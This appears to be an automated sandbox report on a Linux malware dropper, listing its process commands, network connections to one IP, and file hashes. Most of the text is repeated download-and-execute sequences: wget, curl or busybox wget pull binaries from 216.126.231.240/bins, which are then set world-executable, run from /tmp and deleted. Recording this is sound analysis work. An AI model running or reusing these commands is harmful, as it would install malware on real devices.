[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/chmod

[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4

[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/rm

[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/wget

[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/chmod

[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932

[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/rm

[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/wget

[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/chmod

[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD

[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/rm

[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/wget

[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/chmod

[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP

[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/rm

[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/wget

[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/chmod

[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw

[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/rm

[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/wget

[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/chmod

[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs

[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/rm

[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/wget

[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/chmod

[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z

[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/rm

[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/wget

[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/chmod

[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db

[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/rm

[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/wget

[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/chmod

[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq

[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/rm

[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/wget

[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/chmod

[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ

[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/rm

[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/chmod

[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt

[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/rm

[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/wget

[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/chmod

[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/rm

[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/wget

[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/chmod

[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD

[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/rm

[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/wget

[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/chmod

[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP

[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/rm

[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/wget

[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/804-1-0xb6784000-0xb6795044-memory.dmp

memory/830-2-0xb674f000-0xb6760044-memory.dmp

memory/850-3-0xb673b000-0xb674c044-memory.dmp